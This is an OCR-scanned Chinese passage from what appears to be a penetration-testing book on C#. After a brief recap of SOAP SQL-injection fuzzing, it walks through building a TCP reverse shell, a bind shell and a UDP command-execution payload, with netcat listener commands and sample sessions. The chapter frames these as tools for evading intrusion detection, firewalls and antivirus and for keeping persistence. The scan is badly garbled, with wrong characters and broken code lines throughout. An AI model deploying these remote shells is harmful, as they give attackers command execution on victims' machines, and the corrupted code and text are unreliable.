本 章 介 绍 了 核心 库 中 提供 的 XML 类 。 我 们 使 用 XML 类 实现 了 一 个 完整 的 对 SOAP 服 务 进 行 SQL 注 入 模糊 测试 的 工具 并 介绍 了 
与 SOAP 服 务 交 互 的 一 些 方法 。 


第 一 个 也 是 最 简单 的 方法 是 通过 HTTP GET 请求， 根据 WSDL 文 档 描 述 的 SOAP 服 务 ， 我 们 使 用 动态 查询 字符 串 参 数 构建 
URL。 一 旦 实现 这 一 点 ， 我 们 就 构建 了 一 个 对 SOAP 服 务 的 POST 请 求 进行 模糊 测试 的 方法 。 最 后 ， 我 们 使 用 C# 中 的 LINQ to 
XML 库 来 动态 创建 用 于 对 服务 器 进行 模糊 测试 的 XML， 编 写 了 对 SOAP XML 进行 模糊 测试 的 方法 。 


C# 中 强大 的 XML 类 使 得 处 理 XML 轻 而 易 举 。 许 多 企业 中 的 技术 依赖 XML 进 行 跨 平 台 通 信 ， 序 列 化 和 存储 数据 。 对 于 安全 工 
程 师 或 渗透 测试 者 而 言 了 解 如 何 有 效 地 快速 读 取 和 创建 XML 文 档 是 非常 有 用 的 。 


第 4 章 ”编写 有 效 载 何 


作为 渗透 测试 人 员 或 安全 工程 师 ， 能 够 迅速 编写 和 定制 有 效 载体 非 党 有用。 通常 情况 下 ， 不 同 的 企业 环境 莽 异 很 大 ， 像 
Metasploit 这 种 框架 的 现成 的 有 效 载 从 很 容易 被 入 侵 检测 /防御 系统 、 网 络 访问 控制 ， 或 网 络 中 的 其 他 变量 所 阻止 。 然 而 ， 公 司 
网 络 上 的 Windows 机 器 几乎 忌 是 安 竣 了 .NET 框 架 ， 这 使 得 C# 成 为 一 种 非常 合适 的 用 来 编写 有 效 载 傈 的 语言 。C# 可 用 的 核心 库 
还 具有 优秀 的 网 络 类 ， 可 以 让 你 在 任何 环境 中 运行 。 


最 好 的 渗透 测试 人 员 知 道 如 何 根据 特定 环境 定制 有 效 载 倚 ， 以 便 更 长 时 间 地 逃避 检测 ， 保 持 持久 化 ， 绕 过 入 侵 检测 系统 或 防 
火 墙 。 本 章 介绍 如 何 编写 各 种 使 用 TCP (Tran-smission Control Protocol， 传 输 控制 协议 ) 和 UDP (User Datagram 
Protocol， 用 户 数据 报 协议 ) 的 有 效 载 傈 。 我 们 将 创建 一 个 跨 平台 的 UDP 回 连 有 效 载 集 来 绕 过 脆弱 的 防火 墙 规 则 ， 并 讨论 如 何 
运行 任意 的 Metasploit 程 序 集 有 效 载 傈 来 帮助 逃避 病毒 检测 。 


4.1 编写 回 连 的 有 效 载 何 


我 们 要 写 的 第 一 种 有 效 载 集 是 回 连 ， 它 允许 攻击 者 监听 从 目标 中 返回 的 连接 。 如 果 你 没有 直接 访问 有 效 载 傈 正 企 运 行 的 机 器 
的 权限 ， 则 此 类 型 的 有 效 载荷 是 有 用 的 。 例 如 ， 如 果 你 在 外 网 上 使 用 Metasploit Pro 进 行 网 络 钓鱼 ， 那 么 这 种 类 型 的 有 效 载荷 可 
以 让 目标 到 达 网 络 外 部 与 你 连接 。 我 们 稍 后 将 讨论 的 另 一 种 方法 是 使 有 效 载 倚 在 目标 机 器 上 监听 来 自 攻 击 者 的 连接 。 像 这 样 的 绑 
定 有 效 载荷 在 你 可 以 获得 网 络 访问 时 对 于 持久 化 最 有 用 。 


4.1.1 网络 流 


我 们 将 使 用 大 多 数 类 Unix 操 作 系 统 上 可 用 的 netcat 实 用 程序 来 测试 我 们 的 绑 定 和 回 连 有 效 载 傈 。 大 多 数 Unix 操 作 系 统 预 站 
了 netcat,， 但 如 果 要 在 Windows 上 使 用 ， 你 必须 使 用 Cygwin 下 载 该 实用 程序 或 使 用 独立 的 二 进 制 文件 (或 从 源 代码 构建 ) 。 首 
先 ， 设 置 netcat 监 听 来 自我 们 目标 的 回 连 ， 如 清单 4-1 所 示 。 


清单 4-1: 使 用 netcat 在 4444 端 口上 监听 
$ nc -1 4444 


我 们 的 回 连 有 效 载 答 需要 创建 一 个 网 络 流 来 读 取 和 写 入 。 如 清单 4-2 所 示 ， 有 效 载 集 的 Main () 万 法 的 第 一 行 根据 传递 给 
效 载 答 的 参数 创建 此 流 以 备 后 续 使 用 。 


清单 4-2: 使 用 有 效 载 丛 的 参数 创建 回 到 攻击 者 的 流 


public static void Main(string[ | args ) 


using (TcpClient client = new @TcpClient(args[0]，@int.Parse(args[1]))) 


using (Stream stream = client.@CetStream()) 


using (StreamReader rdr = new @StreamReader(stream)) 


{ 


TcpClient 类 构造 浮 数 有 两 个 参数 : string 类 型 的 需要 连接 的 主机 和 int 类 型 的 需要 连接 的 主机 上 的 端口 。 使 用 传递 给 有 效 载 
荷 的 参数 ， 假 设 第 一 个 参数 是 要 连接 的 主机 ， 我 们 将 参数 传递 给 TcpClient 构 造 函 数 @@。 默 认 情 况 下 参数 是 字符 串 ， 我 们 不 需要 
将 主机 转换 为 任何 特殊 类 型 。 


第 二 个 参数 指定 要 连接 的 端口 ， 必 须 以 int 形 式 给 出 。 为 了 实现 这 一 点 ， 我 们 使 用 int.Parse () 静态 方法 将 第 二 个 参数 从 
字符 串 转 换 为 int。 (C# 中 的 许多 类 型 都 有 一 个 将 一 个 类 型 转换 为 男 一 个 类 型 的 静态 Parse () 方法 。) 在 实例 化 TcpClient 之 
后 ,我 们 调用 客户 端的 GetStream () 方法 @ 并 将 其 分 配给 变量 stream， 我 们 将 从 中 读 取 和 写 入 。 最 后 ， 我 们 将 流传 递 给 
StreamReader 类 构造 函数 @， 以 便 我 们 可 以 轻松 地 读 取 来 自 攻 击 者 的 命令 。 


接 下 来 ， 只 要 从 netcat 监 听 器 友 送 命令 ， 有 效 载 集 束 会 从 流 中 读 取 。 为 此 ， 我 们 将 使 用 清单 4-2 中 创建 的 流 ， 如 清 蛙 4-3 所 


示 . 
清单 4-3: 从 流 中 读 取 命令 并 从 命令 参数 中 解析 命令 


while (true) 


| 
string cmd = fdr.@ReadLine() ; 


if (string.IsNullOrEmpty(cmd)) 


rdr. 包 Close() ; 
stream.Closel(); 
client.Close(); 
return; 


} 


if (string.®@IsNullOrWhiteSpace(cmd)) 
continue; 


string[] split = cmd.Trim().@Split(' '); 
string filename = split.®@First(); 
string arg = string.@Join(" ", split.@Skip(1)); 


在 无 限 while 循 环 中 ，StreamReader ReadLine () 方法 @ 从 流 中 读 取 一 行 数 据 ， 然 后 将 其 分 配给 cmd 变 量 。 我 们 根据 数据 
流 中 出 现 换行 符 的 位 置 (\n， 或 十 六 进 制 的 0x0a) 来 确定 一 行 数据 。 如 果 ReadLine () 返回 的 字符 串 为 空 或 null， 则 关闭 @ 流 
读 取 器 、 流 和 客户 端 ， 然 后 从 程序 返回 。 如 果 字 符 串 只 包含 空格 @)， 则 使 用 continue 开 始 循 环 ， 这 使 我 们 回 到 ReadLine () 方 
法 重新 开始 。 


从 网 络 流 读 取 要 运行 的 命令 后 ， 将 该 命令 的 参数 与 命令 本 身分 开 。 例 如 ， 如 果 攻 击 者 发 送 命 令 ls-a， 则 命令 为 Is， 命令 的 参 
数 为 -a。 

使 用 Split () 方法 @ 以 字符 串 中 的 每 个 空格 为 分 隔 符 分 隅 完整 的 命令 然后 返回 一 个 字符 串 数组 以 分 隅 参数 。 接 下 来 ， 使 用 
在 System.Lingq 命 名 空间 中 枚 举 类 型 (如 数组 ) 的 First () 方法 @ 来 选择 返回 的 字符 串 数 组 中 的 第 一 个 元 素 ， 并 将 其 分 配给 字符 


串 filename 和 存储 我 们 的 基本 命令 。 这 应 该 是 实际 的 命令 名 称 。 然 后 ，Join () 方法 @ 将 split 数 组 中 除了 第 一 


Ac 


| 子 付 


串 乙 外 的 所 有 


字符 串 连 接 到 一 起 ， 并 以 一 个 空格 作为 连接 字符 。 我 们 使 用 LINQ 方 法 Skip () @ 跳 过 数组 中 的 第 一 个 元 素 。 生 成 的 字符 串 应 包 
含 字 


传递 给 该 命令 的 所 有 参数 。 


4.1.2 ”运行 命令 


这 个 新 的 


符 串 被 分 配给 字符 串 arg。 


现在 我 们 需要 运行 命令 并 将 输出 返回 给 攻击 者 。 如 清 蛙 4-4 所 示 ， 我 们 使 用 Process 和 ProcessStartinfo 类 来 设置 和 运行 命 
令 ， 然 后 将 输出 写 回 给 攻击 者 。 


清单 4-4: 使 回 连 有 效 载 集 运行 攻击 者 提供 的 命令 并 返回 输出 


try 


Process prc = new @Process(); 


pre 
Dre 
prc. 
.StartInfo.@UseShellExecute = false; 


prc 


biG 
bre 
.StandardOutput.BaseStream.@CopyTo(stream); 


prc 


} 


cateh 


{ 


prc. 


@StartInfo = new ProcessStartInfo(); 
StartInfo.@FileName = filename; 
StartInfo.@Arguments = arg,; 


StartInfo.@RedirectStandardOutput = true; 
@Start( ) ; 


WaitForExit(); 


string error = “Error running command ”+ cmd + An ; 
byte[ | errorBytes = ©@Encoding.ASCIIT.GetBytes(error); 
stream. @Write(errorBytes, 0, errorBytes.Length); 


在 实例 化 一 个 新 的 Process 类 > 之后， 将 新 的 ProcessStartinfo 类 分 配给 Process 类 的 Startinfo 属 性 @， 它 允许 我 们 为 命令 
定义 某 些 选 项 ， 以 便 可 以 得 到 输出 。 为 Startinfo 属 性 分 配 了 一 个 新 的 ProcessStartinfo 类 之 后 将 下 列 值 分 配给 Startinfo 属 性 : 
FileName 属 性 @)， 即 我 们 要 运行 的 命令 ; Arguments 属 性 @ 包 含 该 命令 的 所 有 参数 。 


我 们 还 将 UseShellExecute 属 性 设置 为 false， 将 RedirectStandardOutput 属 性 @ 设 置 为 true。 如 果 将 UseShellExecute 
设置 为 true， 则 该 命令 将 在 另 一 个 系统 shell 的 上 下 文中 运行 ， 而 不 是 直接 由 当前 的 可 执行 文件 运行 。 将 
RedirectStandardOutput 设 置 为 true， 我 们 可 以 使 用 Process 类 的 StandardOutput 属 性 来 读 取 命令 输出 。 


一 旦 设置 了 Startinfo 属 性 ， 我 们 调用 Process 的 Start () @ 开 始 执行 命令 。 当 进程 正在 运行 时 ， 我 们 使 用 StandardOutput 
流 的 BaseStream 属 性 的 CopyTo () @ 方 法 将 其 标准 输出 直接 复制 到 网 络 流 中 以 发 送 给 攻击 者 。 如 果 在 执行 期 间 发 生 错误 ， 则 
Encoding.AsCll.GetBytes () @ 将 字符 串 Error running command<cmd> 转 换 为 字 节 数组 ， 然 后 使 用 流 的 Write () 方法 @ 


将 其 写 入 攻击 者 的 网 络 流 。 


4.1.3 ”运行 有 效 载 何 


以 127.0.0.1 和 4444 作 为 参数 运行 有 效 载荷 应 该 回 连 我 们 的 netcat 监 听 器 ， 以 便 我 们 可 以 在 本 地 机 器 上 运行 命令 并 将 其 显示 
在 终端 中 ， 如 清单 4-5 所 示 。 


清单 4-5: 连接 到 本 地 监听 器 并 运行 命令 的 回 连 有 效 载体 


$ nc -1 4444 
whoami 
bperry 
uname 
Linux 


4.2 ” 绑 定 有 效 载 全 


当 位 于 可 以 直接 访问 可 能 运行 你 的 有 效 载 答 的 计算 机 的 网 络 时 ， 有 时候 会 希望 有 效 载 位 等 待 你 连接 到 它们 ， 而 不是 你 等 待 它 
们 的 连接 。 在 这 种 情况 下 ， 有 效 载 从 应 该 在 本 地 缘 定 到 你 可 以 使 用 netcat 轻 松 连接 到 的 端口 ， 以 便 你 可 以 开始 与 系统 的 shell 进 


行 交互 。 


在 回 连 有 效 载 集中 ， 我 们 使 用 TcpClient 类 创建 与 攻击 者 的 连接 。 这 里 使 用 Tcp-Listener 类 而 不 是 TcpClient 类 来 监听 来 自 攻 
击 者 的 连接 ， 如 清单 4-6 所 示 。 


清单 4-6: 通过 命令 行 参 数 在 给 定 端口 上 启动 TcpListener 


public static void Main(string[] args ) 


{ 

int port = @int.Parse(args[0]); 

TcpListener listener = new @TcpListener(IPAddress.Any, port); 
try 


listener.®@Start(); 
} 


catch 


{ 


return; 


} 


在 开始 监听 之 前 ， 我 们 将 使 用 int.Parse () @@ 将 传递 给 有 效 载 倚 的 参数 也 项 是 将 要 监听 的 痛 口 转换 为 整数 。 然 后 通过 传递 
IPAddress.Any 作 为 构造 疯 数 的 第 一 个 参数 和 我 们 想 要 监听 的 端口 作为 第 二 个 参数 来 实例 化 一 个 新 的 TcpListener 类 。 作 为 第 
一 个 参数 传递 的 IPAddress.Any 值 告诉 TcpListener 监 听任 何 可 用 的 接口 (0.0.0.0) 。 


接 下 来 ， 尝 试 在 try/catch 块 中 开始 监听 端口 。 这 样 做 是 因为 调用 Start () @ 可 能 引发 异常 ， 例 如 ， 如 果 有 效 载荷 没有 作为 
特权 用 户 运 行 并 且 尝 试 绑 定 到 小 于 1024 的 端口 号 ， 或 者 尝试 绑 定 到 已 由 另 一 个 程序 绑 定 的 新 口 。 通 过 在 try/catch 块 中 运行 
Start () ， 我 们 可 以 捕获 这 个 异常 ， 如 果 需 要 可 以 正常 退出 。 当 然 ， 如 果 Start () 成 功 ， 有 效 载 信 将 开始 监听 该 六 口上 的 新 连 


接 。 


4.2.1 接收 数据 ， 运 行 售 令 ， 返 回答 出 


现在 可 以 开始 接受 来 和 目 攻 击 者 的 数据 并 解析 命令 ， 如 清单 4-7 所 示 。 
清单 4-7: 从 网 络 流 中 读 取 命令 并 从 参数 中 分 隔 命 令 


@while (true) 


using (Socket socket = @listener.AcceptSocket()) 
L 


using (NetworkStream stream = new @NetworkStream(socket)) 
using (StreamReader rdr = new @StreamReader(stream)) 
@while (true) 
string cmd = rdr.ReadLine(); 
if (string.IsNullOrEmpty(cmd)) 


rdr.Close(); 
stream.Close(); 
listener. Stop(); 
break ; 


} 


if (string.IsNullOrWhiteSpace(cmd)) 
continue; 
string[] split = cmd.Trim().@Split(' '); 
string filename = split.@First(); 
string arg = string.@Join(" ", split.Skip(1)); 


为 了 与 有 效 载荷 断 开 之 后 在 目标 上 实现 持久 化 ， 我 们 通过 把 将 由 listener.Accept-Socket () 返回 的 Socket 传 递 给 
NetworkStream 构 造 函 数 @) 来 在 无 限 while 循 环 @ 中 实例 化 一 个 新 的 NetworkStream 类 。 然 后 ， 为 了 有 效 地 读 取 
NetworkStream， 人 在 using 语 句 的 上 下 文中 ， 我 们 通过 将 网 络 流传 递 给 StreamReader 构 造 冰 数 来 实例 化 一 个 新 的 Stream- 
Reader 类 @。 一 旦 设置 了 StreamReader， 束 可 以 使 用 第 二 个 无 限 while 循 环 继 续 读 取 命 令 ， 和 直到 一 个 空 行 被 攻击 者 友 送 到 有 
效 载 何 。 

为 了 从 沅 中 解析 和 执行 命令 并 将 输出 返回 给 连接 的 攻击 者 ， 我 们 在 内 部 while 循 环 中 声明 一 系列 字符 串 变 量 ， 并 以 空格 作为 
分 隔 符 将 原始 输入 拆 分 为 字符 串 @。 接 下 来 ， 我 们 使 用 LINQ 从 split 中 选择 第 一 个 元 素 9)， 并 将 其 赋值 为 要 运行 的 命令 。 然 后 我 
们 再 次 使 用 LINQ 来 连接 @split 数 组 中 第 一 个 元 素 之 后 的 所 有 字符 串 ， 并 将 生成 的 字符 串 (使 用 空格 分 隔 ) 分 配给 arg 变 量 。 


4.2.2 ”从 流 中 执行 命令 
现在 我 们 可 以 设置 Process 和 Processstartlnfo 类 ， 使 用 参数 (如 果 有 的 话 ) 运行 命令 ， 并 捕获 输出 ， 如 清单 4-8 所 示 。 


清单 4-8: 运行 命令 ,捕获 输出 并 将 其 友 送 回 攻击 者 


try 


Process prc = new @Process(); 

prc.StartInfo = new ProcessStartIinfo(); 
prc.StartIinfo.@FileName = filename; 
prc.StartIinfo.@Arguments = arg; 
prc.StartIinfo.UseShellExecute = false; 
prc.StartIinfo.RedirectStandardOutput = true; 
prc.@Start(); 
prc.StandardOutput.BaseStream.©@CopyTo(stream); 
prc.WaitForExit(); 


} 


catch 


{ 


string error = “Error running command ”+ cmd + “\n'; 
byte[ |] errorBytes = @Encoding.ASCIIT.GetBytes(error); 
stream. @Write(errorBytes, 0, errorBytes.Length); 


与 上 一 书 中 讨论 的 回 连 有 效 载 傈 一 样 ， 为 了 运行 命令 ， 我 们 实例 化 一 个 新 的 Process 类 @， 并 将 一 个 新 的 ProcessStartinfo 
类 分 配给 Process 类 的 Startinfo 属 性 。 我 们 将 Startinfo 中 的 FileName 属 性 @ 设 置 为 命令 filename， 并 将 Arguments 属 性 @ 设 置 
为 命令 的 参数 。 然 后 ， 将 UseShellExecute 属 性 设置 为 false， 以 便 我 们 的 可 执行 文件 直接 局 动 命 令 ， 并 将 
RedirectStandardOutput 属 性 设置 为 true， 以 便 我 们 可 以 捕获 命令 输出 并 将 其 返回 给 攻击 者 。 


我 们 调用 Process 类 的 Start () 方法 @ 启 动 命令 。 当 进程 运行 时 ， 我 们 通过 将 发 送 给 攻击 者 的 网 络 流 作 为 参数 传递 给 
CopyTo () 加 将 标准 输出 流 直 接 复 制 到 其 中 ， 然 后 等 待 进程 退出 。 如 果 发 生 错 误 ， 我 们 使 用 Encoding.ASCll.GetBytes () @@ 
将 字符 串 Error running command<cmd> 转 换 为 字 节 数组 ， 然 后 将 字 节 数组 瑟 入 网 络 流 ， 并 使 用 流 的 Write () 方法 @ 友 适 给 
攻击 者 。 


以 4444 作 为 参数 运行 有 效 载 从 将 使 监听 器 监听 所 有 可 用 接口 上 的 4444 端 口 。 现 在 我 们 可 以 使 用 netcat 连 接 到 监听 端口 开始 
执行 命令 并 返回 其 输出 ， 如 清单 4-9 所 示 。 


清单 4-9: 连接 到 绑 定 有 效 载荷 并 执行 命令 


$ nc 127.0.0.1 4444 
whoami 
bperry 
uname 
Linux 


4.3 ”使 用 UDP 攻击 网 络 


目前 对 论 的 有 效 载 傈 使 用 TCP 进 行 通信 。TCP 是 一 种 有 状态 的 协议 ， 人 允许 两 台 计 算 机 在 一 段 的 时 间 内 彼此 保持 和 连接。 一 种 替 
代 协 议 是 UDP， 与 TCP 不 同 ， 它 是 无 状态 的 : 通信 时 两 侣 联网 计算 机 之 间 不 会 保持 连接 。 相 反 它 通过 网 络 广播 执行 通信 ， 每 台 计 
算 机 监听 到 其 IP 地 址 的 广播 。UDP 和 TCP 之 间 的 另 一 个 非常 重要 的 区 别 是 TCP 滨 试 确保 友 送 到 机 器 的 数据 包 将 以 和 友 送 时 相同 的 
顺序 到 达 。 相 比 之 下 ，UDP 数 据 包 可 以 以 任何 顺序 接收 ,或 者 根本 不 接收 ， 这 使 得 TCPHLUDP 可 靠 。 然而，UDP 具 有 一 些 苏 
处 。 比 如 ， 因 为 它 不 试图 确保 计算 机 接收 它 友 送 的 数据 包 ， 所 以 它 非 常 快 。 它 也 不 像 TCP 那 样 在 网 络 上 经 党 被 检查 ， 因 为 一 些 防 
火 墙 只 能 处 理 TCP 流 量 。 这 使 得 UDP 在 攻击 网 络 时 是 一 个 很 好 用 的 协议 ， 所 以 让 我 们 看 看 如 何 编写 一 个 UDP 有 效 载 集 来 在 远程 
机 器 上 执行 命令 并 返回 结果 。 


不 像 以 前 的 有 效 载 集 那 样 使 用 TcpClient 或 TcpListener 类 来 实现 一 个 连接 和 通信 ， 我 们 将 使 用 UDP 上 的 UdpClient 和 Socket 
类 。 攻 击 者 和 目标 机 器 都 需要 监听 UDP 广播 ， 并 维护 一 个 套 接 字 来 将 数据 广播 到 另 一 台 计 算 机 。 


4.3.1 运行 在 目标 机 器 上 的 代码 


在 目标 机 器 上 运行 的 代码 将 在 UDP 端 口上 监听 命令 ,执行 这 些 命令 ， 并 通过 UDP 套 接 字 将 输出 返回 给 攻击 者 ， 如 清单 4-10 
所 泵 。 


清单 4-10: 在 目标 机 器 上 运行 的 代码 的 Main () 万 法 的 前 五 行 


public static void Main(string[] args ) 


int lport = int.@Parse(args[0|]); 
using (UdpClient listener = new @UdpClient(lport)) 


IPEndPoint localEP = new ©@IPEndPoint(IPAddress.Any, lport); 
string cmd; 
byte[ ] input; 


在 友 送 和 接收 数据 之 前 ， 为 端口 设置 一 个 变量 来 监听 。 (为 了 简单 起 见 ， 假 设 我 们 正在 攻击 单独 的 虚拟 机 ， 我 们 将 使 目标 机 
器 和 攻击 者 机 器 都 监听 同一 端口 上 的 数据 ) 。 如 清单 4-10 所 示 ， 使 用 Parse () @@ 将 作为 参数 传递 的 字符 串 转换 为 整数 ， 然 后 将 
该 端口 传递 给 UdpClient 构 造 函 数 @ 以 实例 化 一 个 新 的 UdpClient。 我 们 还 通过 传 入 IPAddress.Any 作 为 第 一 个 参数 和 要 监听 的 
端口 作为 第 二 个 参数 来 设置 |PEndPoint 类 @。 将 新 对 象 分 配给 localEP (本 地 终端 ) 变量 。 现 在 可 以 开始 从 网 络 广播 接收 数据 
了 。 


Main 中 的 while 循 环 
如 清单 4-11 所 示 ， 我 们 开始 一 个 持续 的 while 循 环 直 到 从 攻击 者 收 到 一 个 空 字 符 串 。 


清单 4-11: 使 用 命令 监听 UDP 广播 ， 并 从 参数 中 解析 命令 


while (true ) 
{ 


input = listener.@Receive(ref localEP); 

cmd = @Encoding.ASCII.GetString(input, 0, input.Length); 
if (string.IsNullOrEmpty(cmd)) 
{ 


listener.Close(); 
return; 


} 


if (string.IsNullOrWhiteSpace(cmd)) 


continue; 


string[] split = cmd.Trim().@Split(" '); 
string filename = split.@First(); 

string arg = string.@Join(" ", split.Skip(1)); 
string results = string.Empty; 


在 这 个 while 循 环 中 ， 我 们 调用 listener.Receive () ， 传 入 实例 化 的 IPEndPoint 类 。Receive () @@ 接 收 来自 攻 击 者 的 数 
据 ， 使 用 攻击 者 主机 的 IP 地 址 和 其 他 连接 信息 填写 localEP Address 属 性 ， 所 以 我 们 稍 后 响应 时 可 以 使 用 该 数据 。Receive () 还 
阻止 有 效 载 荷 的 执行 ， 直 到 接收 到 UDP 广 播 。 


收 到 广播 后 ，Encoding.AsCll.Getstring () @ 将 数据 转换 为 ASCll 字 符 串 。 如 果 字 符 串 为 空 或 hull， 则 从 while 循 环 中 断 ， 
有 效 载 荷 进 程 结束 并 退出 。 如 果 字 符 串 只 包含 空格 ， 则 使 用 continue 来 重新 启动 循环 ， 从 攻击 者 接收 一 个 新 的 命令 。 一 旦 确保 
命令 不 是 一 个 空 字符 串 或 空格 ， 则 使 用 空格 作为 分 隅 符 将 它 分 隔 @ (与 我 们 对 TCP 有 效 载 倚 所 做 的 相同 ) ， 然 后 将 该 命令 从 分 隔 
返回 的 字符 串 数组 中 分 离 出 来 @。 然 后 通过 连接 split 数 组 第 一 个 元 素 @ 后 的 所 有 字符 串 来 创建 参数 字符 串 。 


现在 我 们 可 以 执行 命令 并 通过 UDP 广 播 将 结果 返回 给 友 送 者 ， 如 清早 4-12 所 示 。 
清单 4-12: 执行 接收 到 的 命令 并 将 输出 回 传 给 攻击 者 


try 
{ 
Process prc = new Process(); 
prc.StartInfo = new ProcessStartInfo(); 
prc.StartInfo.FileName = filename; 
prc.StartInfo.Arguments = arg,; 
prc.StartInfo.UseShellExecute = false; 
prc.StartInfo.RedirectStandardOutput = true; 
prc.Start(); 
prc.WaitForExit(); 
results = prc.StandardOutput.@ReadToEnd(); 
} 


catch 


\ 


results = "There was an error running the command: ”+ filename; 


using (Socket sock = new @Socket(AddressFamily.InterNetwork, 
SocketType.Dgram, ProtocolType.Udp)) 


IPAddress sender = ©@localEP.Address,; 

IPEndPoint remoteEP = new @IPEndPoint(sender, lport); 
byte[ ] resultsBytes = Encoding.ASCIIT.GetBytes(results); 
sock.@SendTo(resultsBytes, remoteEP); 


与 以 前 的 有 效 载 伍 一 样 ， 使 用 Process 和 ProcessStartinfo 类 来 执行 命令 并 返回 输出 。 分 别 使 用 用 于 存储 命令 和 命令 参数 的 
filename 和 和 arg 变 量 来 设置 StartInfo 属 性 ， 我 们 还 设置 了 UseShellExecute 属 性 和 RedirectStandardOutput 属 性 。 我 们 通过 调 
用 Start () 方法 开始 新 的 进程 ， 然 后 通过 调用 WaitForExit () 来 等 待 进程 完成 执行 。 一 旦 命令 完成 ， 我 们 调用 进程 
StandardOutput 流 属性 的 ReadToEnd () 方法 @@， 并 将 输出 保存 到 之 前 声明 的 results 字 符 串 中 。 如 果 在 进程 执行 期 间 友 生 错 


误 ， 我 们 把 results 字 符 串 的 值 设置 为 There was an error running the command: <cmd>。 


现在 我 们 需要 设置 用 于 将 命令 输出 返回 给 友 件 人 的 套 接 字 。 我 们 将 使 用 UDP 套 接 字 广 播 数据 。 使 用 Socket 类 ， 通 过 将 枚 举 
值 作为 参数 传递 给 Socket 构 造 函 数 来 实例 化 一 个 新 的 Socket@。 第 一 个 值 AddressFamily.InterNetwork 表 示 我 们 将 使 用 IPv4 地 
址 进行 通信 。 第 二 个 值 SocketType.Dgram 有 意味 着 我 们 将 使 用 UDP 数据 报 (UDP 中 的 D) 而 不 是 TCP 数 据 包 进行 通信 。 第 三 个 也 
是 最 后 一 个 值 ProtocolType.Udp 告 诉 套 接 字 ， 我 们 将 使 用 UDP 与 远程 主机 进行 通信 。 


在 创建 要 用 于 通信 的 套 接 字 之 后 ， 我 们 将 一 个 新 的 IPAddress 变 量 赋值 为 localEP.Address 属 性 @)， 之 前 在 UDP 监 听 器 上 接 
收 到 数据 时 该 值 已 经 设置 为 攻击 者 的 IP 地 址 。 我 们 使 用 攻击 者 的 IPAddress 和 监听 端口 创建 一 个 新 的 IPEndPoint@ 作 为 参数 传递 
给 有 效 载 人 答 。 


一 旦 设置 了 套 接 字 并 且 知 道 在 哪里 返回 我 们 的 命令 输出 ，Encoding.ASCII.GetBytes () 将 输出 转换 为 字 节 数组 。 我 们 使 用 
套 接 字 的 SendTo () @ 来 广播 数据 回 送 给 攻击 者 ， 包 仿 命 令 输 出 的 字 忆 数组 作为 第 一 个 参数 ， 友 送 者 的 终端 作为 第 二 个 参数 。 
最 后 ， 我 们 回 到 while 循 环 的 项 部 ， 读 取 男 一 个 命令 。 


4.3.2 ”运行 在 攻击 者 机 器 上 的 代码 


为 了 使 此 攻击 起 作用 ， 攻 击 者 必须 能 够 监听 并 上 友 送 UDP 广播 到 正确 的 主机 。 清 单 4-13 显 示 了 设置 UDP 监听 器 的 第 一 部 分 代 
码 。 


清单 4-13: 为 运行 在 攻击 者 机 器 上 的 代码 设置 UDP 监听 器 和 其 他 变量 


static void Main(string[] args) 
{ 
int lport = int.@Parse(args|1|]); 
using (UdpClient listener = new @UdpClient(lport)) 


IPEndPoint localEP = new @IPEndPoint(IPAddress.Any, lport); 
string output ; 
byte| | bytes ; 


假设 这 份 代码 将 以 友 大 命令 的 主机 和 监听 疹 口 作为 参数 ， 我 们 给 Parse () @@ 传 递 监 听 的 问 口 以 便 将 字符 串 转换 为 整数 ， 然 
后 将 得 到 的 整数 传递 给 UdpClient 构 造 函 数 @ 来 实例 化 一 个 新 的 UdpClient 类 。 然 后 ， 我 们 将 监听 的 冯 口 和 IPAddress.Any 值 传 
化 给 IPEndPoint 类 构造 遂 数 来 实例 化 一 个 新 的 IPEndPoint 类 @)。 一 旦 设置 了 IPEndPoint， 我 们 将 声明 变量 output 和 bytes 供 以 
后 使 用 。 


创建 发 送 UDP 广 播 的 变量 
清单 4-14 显 示 了 如 何 创建 用 于 友 送 UDP 广播 的 变量 。 
清单 4-14: 创建 要 与 之 通信 的 UDP 套 接 字 和 终端 


using (Socket sock = new @Socket(AddressFamily.InterNetwork, 
SocketType.Dgram, 
ProtocolType.Udp)) 


{ 
IPAddress addr = @IPAddress.Parse(args[0|]); 


IPEndPoint addrEP = new 四 IPEndPoint(addr，1Lport ) ; 


开始 时 ， 在 using 块 的 上 下 文中 实例 化 一 个 新 的 Socket 类 @。 传 递 给 Socket 的 枚 举 值 告诉 套 接 字 我 们 将 使 用 |Pv4 地 址 、 数 据 
报 和 UDP 以 通过 广播 进行 通信 。 使 用 IPAddress.Parse () @ 实 例 化 一 个 新 的 IPAddress， 将 传递 给 代码 的 第 一 个 参数 转换 为 
IPAddress 类 。 然 后 ， 我 们 传递 IPAddress 对 象 和 目标 的 UDP 监 听 器 将 要 监听 的 端口 给 IPEndPoint 构 造 立 数 以 实例 化 一 个 新 的 
IPEndPoint 类 @)。 


与 目标 通信 
清单 4-15 显 示 了 如 何 将 数据 太 送 到 目标 并 从 目标 接收 数据 。 


清单 4-15: 向 目标 UDP 监听 器 友 送 和 接收 数据 的 主要 逻辑 


Console.WritelLine("Enter command to send, or a blank line to quit"); 
while (true) 


string command = @Console.ReadlLine(); 
byte[] buff = Encoding.ASCII.GetBytes(command); 


try 
sock.@SendTo(buff, addrEP); 
if (string.IsNullOrEmpty(command)) 
sock.Closel(); 


listener.Close(); 
return; 


} 


if (string.IsNullOrwhiteSpace(command)) 
continue; 


bytes = listener.®@Receive(ref localEP); 
output = Encoding.ASCIIT.GetString(bytes, 0, bytes.Length); 
Console.Writeline(output); 


catch (Exception ex) 


Console.WritelLine("Exception{0}", ex.Message); 


在 打印 一 些 天 于 如 何 使 用 此 脚本 的 帮助 文本 之 后 ， 我 们 开始 在 while 循 环 中 向 目标 友 送 命令 。 青 
先 ，Console.ReadLine () 从 标准 输入 读 取 一 行 数据 ， 这 将 成 为 友 送 到 目标 机 器 的 命令 。 然 
后 ，Encoding.AsCll.GetBytes () 将 此 字符 串 转 换 为 字 书 数组， 以 便 可 以 通过 网 络 友 送 它 。 


接 下 来 ， 在 try/catch 块 中 ， 我 们 尝试 使 用 SendTo () @ 友 送 字 忆 数组 ， 给 SendTo () 传递 字 刷 数组 和 iP 终 端 作 为 参数 以 
发 送 数据 。 发 送 命 令 字 符 串 后 ， 如 果 从 标准 输入 读 取 的 字符 串 为 空 ， 则 返回 while 循 环 ， 因 为 我 们 在 运行 在 目标 的 代码 中 构建 了 


相同 的 逻辑 。 如 果 字 符 串 不 为 空 但 只 是 空格 则 返回 while 循 环 的 开头 。 然 后 在 UDP 监听 器 上 调用 Receive () @ 来 阻止 执行 ， 直 
